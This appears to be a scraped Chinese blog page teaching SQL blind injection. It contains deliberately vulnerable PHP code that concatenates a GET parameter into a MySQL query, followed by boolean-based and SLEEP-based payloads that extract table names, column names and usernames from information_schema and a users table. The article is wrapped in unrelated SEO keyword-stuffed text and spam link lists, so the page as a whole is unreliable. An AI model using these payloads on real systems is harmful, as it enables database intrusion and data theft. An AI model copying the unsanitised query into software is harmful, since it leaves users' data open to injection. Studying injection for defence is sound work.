当前位置: 首页 > news >正文

建三江建设局网站文艺主题wordpress

news 2025/10/13 20:47:59
建三江建设局网站,文艺主题wordpress,陕西西安网络公司,人才招聘类网站开发文档一、布尔盲注 布尔盲注是通过观察应用程序的响应&#xff08;如HTTP 状态码等&#xff09;来判断查询条件是否为真。 1.进行数据库配置连接 <?php // 数据库连接配置 $host localhost; $dbname testdb; $user root; $password password;//创建数据库连接 $conn new …

一、布尔盲注 布尔盲注是通过观察应用程序的响应(如HTTP 状态码等)来判断查询条件是否为真。

1.进行数据库配置连接
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';//创建数据库连接
$conn = new mysqli($host, $user, $password, $dbname);//检查连接 
if ($conn->connect_error) {die("Connection failed: " . $conn->connect_error);
}// 获取用户输入的参数
$id = $_GET['id'];
2.构造布尔盲注查询
$query = "SELECT * FROM users WHERE id = $id AND 1=1";$result = $conn->query($query);
3.返回查询结果
if ($result->num_rows > 0) {echo "Query is TRUE (数据存在)";
} else {echo "Query is FALSE (数据不存在)";
}// 关闭连接
$conn->close();
?>
4.攻击者可以通过修改 id 参数,一点点推断数据库信息

获取表名

sqlid=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'

获取列名

sqlid=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'

获取数据

sqlid=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

二、时间盲注 时间盲注是通过在 SQL 查询中插入时间延迟函数(如 SLEEP()),根据数据库响应时间来判断查询条件是否为真。

1.进行数据库配置连接
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';//创建数据库连接
$conn = new mysqli($host, $user, $password, $dbname);//检查连接 
if ($conn->connect_error) {die("Connection failed: " . $conn->connect_error);
}// 获取用户输入的参数
$id = $_GET['id'];
2.构造时间盲注查询
$query = "SELECT * FROM users WHERE id = $id AND IF(1=1, SLEEP(5), 0)";
$start_time = microtime(true); // 开始时间
$result = $conn->query($query);
$end_time = microtime(true); // 结束时间
3. 计算查询耗时
$query_time = $end_time - $start_time;
4.根据查询时间判断结果
if ($query_time > 5) {echo "Query is TRUE (延迟 5 秒)";
} else {echo "Query is FALSE (无延迟)";
}
// 关闭连接
$conn->close();
?>
5.攻击者可以通过修改 id 参数,逐步推断数据库信息

获取表名

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)

获取列名

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)

获取数据

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)

三、获取表、列、具体数据的函数

1.获取表名

sqlid=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97

2.获取列名

sqlid=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117

3.获取数据

sqlid=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97
http://www.dtcms.com/a/476258.html

相关文章:

  • 维护网站建设空间出租搜索引擎排名
  • 如何做菠菜网站代理做网站的公司哪家强
  • 室内设计网站 知乎wordpress 加入页面
  • 商丘网站建设的公司哪家好深圳网站公司招聘
  • 长沙做网站费用网页设计与网站建设...
  • 江西省住房建设厅统计网站宜家设计装修怎么收费
  • 西安网站建设哪家咸鱼网二手交易平台
  • GESP C++等级认证三级15-原码反码补码2-2
  • 请教 网站建设价格一般多少钱上海专业的网络推广
  • 上海快速网站建设网页制作网站知识
  • 帮别人做网站需要什么能力福州企业建站服务
  • 公司网站功能模块汽车网页模板
  • 贵阳网站建设seo公众号开发在线一键建站系统
  • 局域网网站怎样做数据库wordpress 做app
  • 建交互网站需要多少钱机械加工工时计算软件
  • 绍兴外贸网站建设网站屏蔽省份
  • 电商 企业网站 福州商超运营与管理
  • 做网站的收益来源汕头网站seo外包
  • 斗鱼类的直播网站开发网站建设网站备案所需资料
  • 徐州做网站建设市场营销策略的概念
  • 郑州网站建设选微锐x1营销型网站建设
  • 百度优化 几个网站内容一样软文怎么写吸引人
  • 石家庄网站建设咨询薇网站建设有趣名称
  • 梅地卡伦手表网站dreamwear做网站步骤
  • 咸阳做网站开发公司三星网上商城退款很慢
  • UE5 测量 -7,面积测量:事件分发,面积测量大纲,设置样条点闭合,禁止定位球碰撞,对连接线的参数标量化处置,宏定义,对数组的两种循环方式,
  • 关于茶文化网站建设的背景网站制作西安企业网站制作
  • 北京优化网站外包公司网站安全建设模板
  • 网站建设有什么优点房产律师在线咨询电话免费
  • 广州网站优化服务商制作网站复杂吗